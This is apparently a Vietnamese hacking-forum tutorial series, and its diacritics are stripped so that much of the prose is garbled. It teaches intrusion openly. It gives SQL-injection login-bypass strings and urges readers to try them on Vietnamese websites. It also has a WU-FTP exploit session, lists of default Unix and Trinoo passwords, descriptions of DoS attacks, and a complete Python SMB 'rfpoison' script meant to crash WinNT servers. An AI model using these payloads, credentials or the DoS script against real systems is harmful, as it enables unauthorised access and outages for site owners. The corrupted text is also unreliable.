TCP/IP vit tt cho Transmission Control Protocol and Internet Protocol, mt Gi tin TCP/IP l mt khi d liu c nn, sau km thm mt header v gi n mt my tnh khc. y l cch thc truyn tin ca internet, bng cch gi cc gi tin. Phn header trong mt gi tin cha a ch IP ca ngi gi gi tin. Bn c th vit li mt gi tin v lm cho n trong ging nh n t mt ngi khc!! Bn c th dng cch ny tm cch truy nhp vo rt nhiu h thng m khng b bt. Bn s phi chy trn Linux hoc c mt chng trnh cho php bn lm iu ny. 32 . ) Linux l gi`: _Ni theo ngha gc, Linux l nhn ( kernel ) ca HH. Nhn l 1 phn mm m trch chc v lin lc gia cc chng trnh ng dng my tnh v phn cng. Cung cp cc chng nng nh: qun l file, qun l b nh o, cc thit b nhp xut nhng cng, mn hnh, bn phm, .... Nhng Nhn Linux cha phi l 1 HH, v th nn Nhn Linux cn phi lin kt vi nhng chng trnh ng dng c vit bi t chc GNU to ln 1 HH hon chnh: HH Linux. y cng l l do ti sao chng ta thy GNU/Linux khi c nhc n Linux. Tip theo, 1 cng ty hay 1 t chc ng ra ng gi cc sn phm ny ( Nhn v Chng trnh ng dng ) sau sa cha mt s cu hnh mang c trng ca cng ty/ t chc mnh v lm thm phn ci t ( Installation Process ) cho b Linux , chng ta c : Distribution. Cc Distribution khc nhau s lng v loi Software c ng gi cng nh qu trnh ci t, v cc phin bn ca Nhn. 1 s Distribution ln hin nay ca Linux l : Debian, Redhat, Mandrake, SlackWare, Suse . 33 . ) Cc lnh cn bn cn bit khi s dng hoc xm nhp vo h thng Linux : _ Lnh " man" : Khi bn mun bit cch s dng lnh no

th c th dng ti lnh nay : Cu trc lnh : $ man . V d : $ man man _ Lnh " uname ": cho ta bit cc thng tin c bn v h thng V d : $uname -a ; n s a ra thng tin sau : Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown _ Lnh id : xem uid/gid hin ti ( xem nhm v tn hin ti ) _ Lnh w : xem cc user ang login v action ca h trn h thng . V D : $w n s a ra thng tin sau : 10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00 _ Lnh ps: xem thng tin cc process trn h thng V d : $ps axuw _ Lnh cd : bn mun di chuyn n th mc no . phi nh n lnh ny . V du : $ cd /usr/bin ----> n s a bn n th mc bin _ Lnh mkdir : to 1 th mc . V d : $ mkdir /home/convit ---> n s to 1 th mc convit trong /home _ Lnh rmdir : g b th mc V d : $ rmdir /home/conga ----> n s g b th mc conga trong /home . _ Lnh ls: lit k ni dung th mc V d : $ls -laR / _ Lnh printf: in d liu c nh dng, ging nh s dng printf() ca C++ . V d : $printf %s "\x41\x41\x41\x41" _ Lnh pwd: a ra th mc hin hnh V d : $pwd ------> n s cho ta bit v tr hin thi ca ta

 u : /home/level1 _ Cc lnh : cp, mv, rm c ngha l : copy, move, delete file V d vi lnh rm (del) : $rm -rf /var/tmp/blah ----->n s del file blah . Lm tng t i vi cc lnh cp , mv . _ Lnh find : tm kim file, th mc V d : $find / -user level2 _ Lnh grep: cng c tm kim, cch s dng n gin nht : grep "something" Vidu : $ps axuw | grep "level1" _ Lnh Strings: in ra tt c cc k t in c trong 1 file. Dng n tm cc khai bo hnh chui trong chng trnh, hay cc gi hm h thng, c khi tm thy c password na VD: $strings /usr/bin/level1 _ Lnh strace: (linux) trace cc gi hm h thng v signal, cc k hu ch theo di flow ca chng trnh, cch nhanh nht xc nh chng trnh b li on no. Trn cc h thng unix khc, tool tng ng l truss, ktrace . V d : $strace /usr/bin/level1 _ Lnh" cat, more ": in ni dung file ra mn hnh $cat /etc/passwd | more --> n s a ra ni dung file passwd mt cch nhanh nht . $more /etc/passwd ----> N s a ra ni dung file passwd mt cch t t . _ Lnh hexdump : in ra cc gi tr tng ng theo ascii, hex, octal, decimal ca d liu nhp vo . V d : $echo AAAA | hexdump _ Lnh : cc, gcc, make, gdb: cc cng c bin dch v debug . V d : $gcc -o -g bof bof.c V d : $make bof V d : $gdb level1 (gdb) break main (gdb) run _ Lnh perl: mt ngn ng V d : $perl -e 'print "A"x1024' | ./bufferoverflow ( Li trn

b m khi ta nh vo 1024 k t ) _ Lnh "bash" : n lc t ng ho cc tc v ca bn bng shell script, cc mnh v linh hot . Bn mun tm hiu v bash , xem n nh th no : $man bash _ Lnh ls : Xem ni dung th mc ( Lit k file trong th mc ) . V D : $ ls /home ----> s hin ton b file trong th mc Home $ ls -a -----> hin ton b file , bao gm c file n $ ls -l -----> a ra thng tin v cc file _ Lnh ghi d liu u ra vo 1 file : Vd : $ ls /urs/bin > ~/convoi ------> ghi d liu hin th thng tin ca th mc bin vo 1 file convoi . 34 . ) Nhng hiu bit c bn xung quanh Linux : a . ) Mt vi th mc quan trng trn server : _ /home : ni lu gi cc file ngi s dng ( VD : ngi ng nhp h thng c tn l convit th s c 1 th mc l /home/convit ) _ /bin : Ni x l cc lnh Unix c bn cn thit nh ls chng hn . _ /usr/bin : Ni x l cc lnh dc bit khc , cc lnh dng bi ngi s dng c bit v dng qun tr h thng . _ /bot : Ni m kernel v cc file khc c dng khi khi ng . _ /ect : Cc file hot ng ph mng , NFS (Network File System ) Th tn ( y l ni trng yu m chng ta cn khai thc nhiu nht ) _ /var : Cc file qun tr _ /usr/lib : Cc th vin chun nh libc.a _ /usr/src : V tr ngun ca cc chng trnh . b . ) V tr file cha passwd ca mt s phin bn khc nhau :

CODE AIX 3 /etc/security/passwd !/tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Ren /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * 35 . ) Khai thc li ca Linux qua l hng bo mt ca WUFTP server : _ WU-FTP Server (c pht trin bi i Hc Washington ) l mt phn mm Server phc v FTP c dng kh ph bin trn cc h thng Unix & Linux ( tt c cc nh phn phi: Redhat, Caldera, Slackware, Suse, Mandrake....) v c Windows.... , cc hacker c th thc thi cc cu lnh ca mnh t xa thng qua file globbing bng cch ghi ln file c trn h thng . _ Tuy nhin , vic khai thc li ny khng phI l d v n phi hi nhng iu kin sau : + Phi c account trn server . + Phi t c Shellcode vo trong b nh Process ca Server . + Phi gi mt lnh FTP c bit cha ng mt globbing mu c bit m khng b server pht hin c li .

+ Hacker s ghi ln mt Function, Code ti mt Shellcode, c th n s c thc thi bi chnh Server FTP . _ Ta hy phn tch VD sau v vic ghi ln file ca server FTP : CODE ftp> open localhost <== lnh m trang b li . Connected to localhost (127.0.0.1). 220 sasha FTP server (Version wu-2.6.1-18) ready <== xm nhp thnh cng FTP server . Name (localhost:root): anonymous <== Nhp tn ch ny 331 Guest login ok, send your complete e-mail address as password. Password:..<== nhp mt khu y 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. <== s dng bin nh phn chuyn i file . ftp> ls ~{ <== lnh lit k th mc hin hnh . 227 Entering Passive Mode (127,0,0,1,241,205) 421 Service not available, remote server has closed connection 1405 ? S 0:00 ftpd: accepting connections on port 21 chp nhn kt nI cng 21 . 7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd 26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 26265 tty3 R 0:00 bash -c ps ax | grep ftpd (gdb) at 26256 Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thc li Wu.ftpd . Symbols already loaded for /lib/libcrypt.so.1 Symbols already loaded for /lib/libnsl.so.1 Symbols already loaded for /lib/libresolv.so.2 Symbols already loaded for /lib/libpam.so.0 Symbols already loaded for /lib/libdl.so.2 Symbols already loaded for /lib/i686/libc.so.6 Symbols already loaded for /lib/ld-linux.so.2

Symbols already loaded for /lib/libnss_files.so.2 Symbols already loaded for /lib/libnss_nisplus.so.2 Symbols already loaded for /lib/libnss_nis.so.2 0x40165544 in __libc_read () from /lib/i686/libc.so.6 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. __libc_free (mem=0x61616161) at malloc.c:3136 3136 in malloc.c Vic khai thc qua li ny n nay ti test vn cha thnh cng ( chng bit lm sai ch no ) . Vy bn no lm c hy post ln cho anh em bit nh . Li Linux hin nay rt t ( c bit l i vi Redhat ), cc bn hy ch i nu c li g mi th bn LI bo mt s cp nht ngay . Khai thc chng nh th no th hi Mod qun l bn , c bit l bn Leonhart , cu ta sing tr li cc bn lm . ( Da theo bi vit ca huynh Binhnx2000 ) 36 . ) Tm hiu v SQL Injection : _ SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn cho ng dng web x l, bn c th login m khng cn username v password, thi hnh lnh t xa, ot d liu v ly root ca SQL server. Cng c dng tn cng l mt trnh duyt web bt k, chng hn nh Internet Explorer, Netscape, Lynx, ... _ Bn c th kim c trang Web b li bng cch dng cc cng c tm kim kim cc trang cho php submit d liu . Mt s trang Web chuyn tham s qua cc khu vc n nn bn phI viewsource mI thy c . VD ta xc nh c trang ny s dng Submit d liu nh nhn vo m m ta

viewsource : CODE <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM> _ Kim tra th xem trang Web c b li ny hay khng bng cch nhp vo login v pass ln lt nh sau : - Login: hi' or 1=1-- Pass: hi' or 1=1-Nu khng c bn th tip vi cc login v pass sau : CODE ' or 1=1-" or 1=1-or 1=1-' or 'a'='a " or "a"="a ') or ('a'='a Nu thnh cng, bn c th login vo m khng cn phi bit username v password . Li ny c dnh dng n Query nn nu bn no tng hc qua c s d liu c th khai thc d dng ch bng cch nh cc lnh Query trn trnh duyt ca cc bn . Nu cc bn mun tm hiu k cng hn v li ny c th tm cc bi vit ca nhm vicky tm hiu thm . 37 . ) Mt VD v hack Web thng qua li admentor ( Mt dng ca li SQL Injection ) : _ Trc tin bn vo google.com tm trang Web admentor bng t kho allinurl : admentor .

_ Thng thng bn s c kt qu sau : http://www.someserver.com/admentor/admin/admin.asp _ Bn th nhp ' or ''=' vo login v password : CODE Login : ' or ''=' Password : ' or ''=' _ Nu thnh cng bn s xm nhp vo Web b li vi vai tr l admin . _ Ta hy tm hiu v cch fix li ny nh : + Lc cc k t c bit nh ' " ~ \ bng cch chm vo javascrip on m sau : CODE function RemoveBad(strTemp) { strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+| \-/g,""); return strTemp; } + V gi n t bn trong ca asp script : CODE var login = var TempStr = RemoveBad (Request.QueryString("login")); var password = var TempStr = RemoveBad (Request.QueryString("password")); _ Vy l ta fix xong li . _ Cc bn c th p dng cch hack ny cho cc trang Web khc c submit d liu , cc bn hy test th xem i , cc

trang Web Vit Nam mnh b nhiu lm , ti kim c kha kh pass admin bng cch th ny ri ( nhng cng bo h fix li ) . _ C nhiu trang khi login khng phi bng ' or ''= m bng cc nick name c tht ng k trn trang Web , ta vo link thnh vin kim nick ca mt admin test th nh . Hack vui v . ===================================== =============== phn 6 ti s cp n kiu tn cng t chi dch v ( DoS attack ) , mt kiu tn cng li hi lm cho trang Web hng mnh nh HVA ca chng ta b tt nghn ch trong thI gian ngn cc admin bn i ung cafe ht m khng ai trng coi . Km theo l cc phng php tn cng DoS v ang c s dng . GOOKLUCK!!!!!!!!!!!!!!!!!!!! ( Ht phn 5 ) Bi vit ca ANHDENDAY . Cc kiu tn cng mng : 1-Tn cng trc tip : y l mt phng php c in dng d tm tn ngi s dng (user) v mt khu truy cp ca h (password).Phng php ny kh n gin , d thc hin v khng i hi bt k mt iu kin no bt u.Chng ta c th s dng nhng thng tin nh tn ngi dng , ngy sinh , a ch , s nh ... on mt khu.Trong trng hp c c c c danh sch ngi s dng (user list ) v mi trng lm vic , mt chng trnh on mt khu s

c s dng. N hot ng mt cch t ng bng cch s dng cc t hp cc t trong mt t in ln v theo nhng qui tc m ngi dng nh ngha.Kh nng thnh cng ca phng php ny c th ln n 30% (nu bn may mn).V khi thnh cng ta s c c quyn Admin , Root. Hai chng trnh thng c dng cho phng php ny l chng trnh Sendmail v Rlogin ca h thng Unix. Sendmail l mt chng trnh phc tp vi m ngun bao gm hng ngn dng lnh C . Sendmail c chy vi quyn ca ngi qun tr h thng do chng trnh phi c quyn ghi vo hp th ca ngi s dng. V Sendmail nhn trc tip cc yu cu v mng th tn bn ngoi nn n tr thnh ngun cung cp nhng l hng bo mt truy cp h thng. Rlogin cho php ngi s dng t mt my trn mng truy cp t xa vo mt my khc s dng ti nguyn ca my ny. Trong qu trnh nhn tn v mt khu ca ngi s dng , rlogin khng kim tra di dng nhp nn ta c th a vo mt xu lnh c tnh ton trc ghi ln m chng trnh ca Rlogin , t chim quyn truy cp. 2-Nghe trm Vic nghe trm thng tin trn mng c th em li nhng thng tin c ch nh tn , mt khu ca ngi s dng , cc thng tin chuyn qua mngVic nghe trm thng c cc hacker tin hnh sau khi chim c quyn truy cp h thng thng qua cc chng trnh cho php a giao tip mng (NIC Network Interface Card) vo ch nhn ton thng tin lu truyn trn mng.Nhng thng tin ny cng c th ly c trn Internet. 3-Gi mo a ch IP : Vic ny c th thc hin thng qua vic dn ng trc tip.Vi cc tn cng ny , cc hacker s gi cc gi tin IP

ti mng bn trong vi mt a ch IP gi (Thng thng l IP ca mt mng hoc mt my tnh c coi l an ton i vi mng bn trong) ,ng thi ch r ng dn m cc gi tin IP phi gi i. 4-V hiu cc chc nng ca h thng : y l kiu tn cng lm t lit h thng , khng cho n thc hin cc chc nng m n c thit k. Kiu tn cng ny khng ngn chc c do cc phng tin tn cng li chnh l nhng phng tin lm vic v truy cp thng tin trn mng.V d nh s dng lnh ping vi tc cao nht c th buc mt h thng tiu hao ton b tc tnh ton v kh nng ca mng tr li cc lnh ny , khng cn ti nguyn thc hin nhng vic khc. 5-Tn cng vo yu t con ngi : Hacker c th gi lm ngi s dng , sau yu cu ngi qun tr h thng thay i mt khu v quyn truy cp ca mnh i vi h thng hay thay i mt s cu hnh h thng thc hin nhng phng php tn cng khc.Khng c mt thit b no c th ngn chng c phng php ny ngoi s cnh gic ca ngi qun tr h thng. Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bn khi bn kt ni ti n . u tin , khi bn gi Unix , thng thng n s xut hin mt du nhc : Log in : , ( tuy nhin , ch vi nh vy th cng cha chc chn y l Unix c ngoI tr chng xut hin thng bo trc ch log in : nh v d : Welcome to SHUnix. Please log in .) By gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l . Mt account thng thng gm c 8 c tnh hoc hn , sau khi bn nhp account vo , bn s thy c mt mt khu , bn hy th nhp Default Password th theo bng sau :

Account-------------------------Default Password Root-----------------------------------------------Root Sys------------------------------------------------Sys / System / Bin Bin-------------------------------------------------Sys / Bin Mountfsy------------------------------------------Mountfsys Nuuc-----------------------------------------------Anon Anon-----------------------------------------------Anon User------------------------------------------------User Games---------------------------------------------Games Install----------------------------------------------Install Demo-----------------------------------------------Demo Guest----------------------------------------------Guest

Xin b sung thm l : login: login: login: login: login: login: login: login: login: login: login: login: login: login: login: root pw: root root pw: system root pw: sysop sys pw: sys sys pw: system daemon pw: daemon uucp pw: uucp tty pw: tty test pw: test unix pw: unix unix pw: test bin pw: bin adm pw: adm adm pw: admin admin pw: admin

login: login: login: login: login: login: login: login: login: login: login: login: login: login: login: login: login: login: login:

sysman pw: sysman sysman pw: sys sysman pw: system sysadmin pw: sysadmin sysadmin pw: system sysadmin pw: sys sysadmin pw: admin sysadmin pw: adm who pw: who learn pw: learn uuhost pw: uuhost guest pw: guest host pw: host nuucp pw: nuucp rje pw: rje games pw: games games pw: player sysop pw: sysop demo pw: demo

V y l phn 6 38 . ) DoS attack l g ? ( Denial Of Services Attack ) _ DoS attack ( dch l tn cng t chi dch v ) l kiu tn cng rt li hi , vi loi tn cng ny , bn ch cn mt my tnh kt ni Internet l c th thc hin vic tn cng c my tnh ca I phng . thc cht ca DoS attack l hacker s chim dng mt lng ln ti nguyn trn server ( ti nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm cho server khng th no p ng cc yu cu t cc my ca ngui khc ( my ca nhng ngi dng bnh thng ) v server c th nhanh chng b ngng hot ng, crash hoc reboot . 39 . ) Cc loi DoS attack hin ang c bit n v s

dng : a . ) Winnuke : _DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x . Hacker s gi cc gi tin vi d liu "Out of Band" n cng 139 ca my tnh ch.( Cng 139 chnh l cng NetBIOS, cng ny ch chp nhn cc gi tin c c Out of Band c bt ) . Khi my tnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li s c hin th ln vi nn nhn do chng trnh ca Windows nhn c cc gi tin ny nhng n li khng bit phn ng vi cc d liu Out Of Band nh th no dn n h thng s b crash . b . ) Ping of Death : _ kiu DoS attack ny , ta ch cn gi mt gi d liu c kch thc ln thng qua lnh ping n my ch th h thng ca h s b treo . _ VD : ping l 65000 c . ) Teardrop : _ Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngun n h thng ch u phi tri qua 2 qu trnh : d liu s c chia ra thnh cc mnh nh h thng ngun, mi mnh u phi c mt gi tr offset nht nh xc nh v tr ca mnh trong gi d liu c chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vo gi tr offset sp xp cc mnh li vi nhau theo th t ng nh ban u . Li dng s h , ta ch cn gi n h thng ch mt lot gi packets vi gi tr offset chng cho ln nhau. H thng ch s khng th no sp xp li cc packets ny, n khng iu khin c v c th b crash, reboot hoc ngng hot ng nu s lng gi packets vi gi tr offset chng cho ln nhau qu ln ! d . ) SYN Attack :

_ Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch ip ngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi tr li cc a ch khng c thc v ch I nhn thng tin phn hi t cc a ch ip gi . V y l cc a ch ip khng c thc, nn h thng ch s s ch i v ch v cn a cc "request" ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin phn hi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n b crash hoc boot my tnh . == > nm du tay . e . ) Land Attack : _ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch ip khng c thc, hacker s dng chnh a ch ip ca h thng nn nhn. iu ny s to nn mt vng lp v tn gia trong chnh h thng nn nhn , gia mt bn cn nhn thng tin phn hi cn mt bn th chng bao gi gi thng tin phn hi i c . == > Gy ng p lng ng . f . ) Smurf Attack : _Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng khuch i (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin ICMP n a ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP packets ny c a ch ip ngun chnh l a ch ip ca nn nhn . Khi cc packets n c a ch broadcast ca mng khuch i, cc my tnh trong mng khuch i s tng rng my tnh nn nhn gi gi tin ICMP packets n v chng s ng lot gi tr li h thng nn nhn cc gi tin phn hi ICMP packets. H thng my nn nhn s khng chu ni mt khi lng khng l cc gi tin ny v nhanh chng b ngng hot ng, crash

hoc reboot. Nh vy, ch cn gi mt lng nh cc gi tin ICMP packets i th h thng mng khuch i s khuch i lng gi tin ICMP packets ny ln gp bI . T l khuch i ph thuc vo s mng tnh c trong mng khuch I . Nhim v ca cc hacker l c chim c cng nhiu h thng mng hoc routers cho php chuyn trc tip cc gi tin n a ch broadcast khng qua ch lc a ch ngun cc u ra ca gi tin . C c cc h thng ny, hacker s d dng tin hnh Smurf Attack trn cc h thng cn tn cng . == > mt my lm chng si nh , chc my chm li ta nh cho thua . g . ) UDP Flooding : _ Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho h thng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi mo a ch ip ca cc gi tin l a ch loopback ( 127.0.0.1 ) , ri gi gi tin ny n h thng ca nn nhn trn cng UDP echo ( 7 ). H thng ca nn nhn s tr li li cc messages do 127.0.0.1( chnh n ) gi n , kt qu l n s i vng mt vng lp v tn. Tuy nhin, c nhiu h thng khng cho dng a ch loopback nn hacker s gi mo mt a ch ip ca mt my tnh no trn mng nn nhn v tin hnh ngp lt UDP trn h thng ca nn nhn . Nu bn lm cch ny khng thnh cng th chnh my ca bn s b y . h . ) Tn cng DNS : _ Hacker c th i mt li vo trn Domain Name Server ca h thng nn nhn ri cho ch n mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b xm nhp thnh a ch ip, lp tc DNS ( b hacker thay i cache tm thI ) s i thnh a ch ip m hacker cho ch n . Kt qu l thay v phi vo trang Web mun vo th cc nn nhn s vo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch v tht hu hiu !.

g . ) Distributed DoS Attacks ( DDos ) : _ DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c thm nhp vo cc mng my tnh c bo mt km, sau ci ln cc h thng ny chng trnh DDoS server. By gi cc hackers s hn nhau n thi gian nh s dng DDoS client kt ni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn cng DDoS n h thng nn nhn . h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) : _ y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn nht . Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh th ngI tn cng ch cn dng mt my tn cng thng qua cc server ln trn th gii . Vn vi phng php gi mo a ch IP ca victim , k tn cng s gi cc gi tin n cc server mnh nht , nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc server ny s phn hi cc gi tin n a ch ca victim . Vic cng mt lc nhn c nhiu gi tin thng qua cc server ln ny s nhanh chng lm nghn ng truyn ca my tnh nn nhn v lm crash , reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c kt ni Internet n gin vi ng truyn bnh thng cng c th nh bt c h thng c ng truyn tt nht th giI nu nh ta khng kp ngn chn . Trang Web HVA ca chng ta cng b DoS va ri bi cch tn cng ny y . 40 . ) K thut DoS Web bng Python : _ K thut ny ch c th s dng duy nht trn WinNT , v bn cn phi c thi gian th my tnh ca nn nhn mi b down c .

_ Bn hy download Pyphon ti http://www.python.org/ s dng . _ Bn hy save on m sau ln file rfpoison.py . CODE import string import struct from socket import * import sys def a2b(s): bytes = map(lambda x: string.atoi(x, 16), string.split(s)) data = string.join(map(chr, bytes), '') return data def b2a(s): bytes = map(lambda x: '%.2x' % x, map(ord, s)) return string.join(bytes, ' ') # Yu cu tp hp NBSS nbss_session = a2b(""" 81 00 00 48 20 43 4b 46 44 45 4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43 41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45 42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46 43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00 00 00 """) # To SMB crud = ( # Yu cu SMBnegprot """ ff 53 4d 42 72 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43 20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d

49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b 53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d 62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e 30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 """, # Yu cu setup SMB X """ ff 53 4d 42 73 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f 55 50 00 55 6e 69 78 00 53 61 6d 62 61 00 """, # Yu cu SMBtconX """ ff 53 4d 42 75 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00 00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56 45 52 5c 49 50 43 24 00 49 50 43 00 """, # Yu cu khI to SMBnt X """ ff 53 4d 42 a2 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00 07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72 76 73 76 63 00 """, # yu cu bin dch SMB """ ff 53 4d 42 25 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00

00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49 50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00 00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00 00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 """, # SMBtrans Request """ ff 53 4d 42 25 00 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49 50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00 00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00 00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00 5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00 56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 """ ) crud = map(a2b, crud) def smb_send(sock, data, type=0, flags=0): d = struct.pack('!BBH', type, flags, len(data)) #print 'send:', b2a(d+data) sock.send(d+data) def smb_recv(sock): s = sock.recv(4) assert(len(s) == 4) type, flags, length = struct.unpack('!BBH', s) data = sock.recv(length) assert(len(data) == length) #print 'recv:', b2a(s+data) return type, flags, data def nbss_send(sock, data): sock.send(data)

def nbss_recv(sock): s = sock.recv(4) assert(len(s) == 4) return s def main(host, port=139): s = socket(AF_INET, SOCK_STREAM) s.connect(host, port) nbss_send(s, nbss_session) nbss_recv(s) for msg in crud[:-1]: smb_send(s, msg) smb_recv(s) smb_send(s, crud[-1]) # no response to this s.close() if __name__ == '__main__': print 'Sending poison...', main(sys.argv[1]) print 'done.' c th lm down c server ca i phng bn cn phi c thi gian DoS , nu khng c iu kin ch i tt nht bn khng nn s dng cch ny . Nhng vc th cho bit th c ng khng ? 41 . ) Tn cng DDoS thng qua Trinoo : _ Bn bit DDoS attack l g ri phi khng ? Mt cuc tn cng DDoS bng Trinoo c thc hin bi mt kt ni ca Hacker Trinoo Master v ch dn cho Master pht ng mt cuc tn cng DDoS n mt hay nhiu mc tiu. Trinoo Master s lin lc vi nhng Deadmons a nhng a ch c dn n tn cng mt hay nhiu mc tiu trong khong thi gian xc nh . _ C Master v Deamon u c bo v bng Passwd . ch khi chng ta bit passwd th mi c th iu khin c chng , iu ny khng c g kh khn nu chng ta l ch nhn thc s ca chng . Nhng passwd ny thng c

m ho v bn c th thit lp khi bin dch Trinoo t Source -----> Binnary. Khi c chy , Deadmons s hin ra mt du nhc v ch passwd nhp vo , nu passwd nhp sai n s t ng thot cn nu passwd c nhp ng th n s t ng chy trn nn ca h thng . attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. kwijibo Connection closed by foreign host. < == Bn nhp sai attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo> < == bn vo c h thng trinoo _ y l vi passwd mc nh : l44adsl": pass ca trinoo daemon . "gorave": passwd ca trinoo master server khi startup . "betaalmostdone": passwd iu khin t xa chung cho trinoo master . "killme": passwd trinoo master iu khin lnh "mdie" . _ y l mt s lnh dng iu khin Master Server: CODE die-----------------------------------------------------------Shutdown. quit------------------------------------------------------------Log off.

mtimer N----------------------------------------------------t thI gian tn cng DoS , vI N nhn gi tr t 1--> 1999 giy . dos IP-------------------------------------------------------Tn cng n mt a ch IP xc nh . mdie pass---------------------------------------------------V hiu ho tt c cc Broadcast , nu nh passwd chnh xc . Mt lnh c gi ti ("d1e l44adsl") Broadcast Shutdown chng . Mt passwd ring bit s c t cho mc ny mping--------------------------------------------------------Gi mt lnh ping ti ("png l44adsl") cc Broadcast. mdos <ip1:ip2..> ------------------------------------------Send nhiu lnh DOS ("xyz l44adsl 123:ip1:ip2") n cc Broadcast. info------------------------------------------------------------Hin th thng tin v Trinoo . msize----------------------------------------------------------t kch thc m cho nhng gi tin c send i trong sut thI gian DoS. nslookup host----------------------------------------------Xc nh tn thit b ca Host m Master Trinoo ang chy . usebackup--------------------------------------------------Chuyn tI cc file Broadcast sao lu c to bi lnh 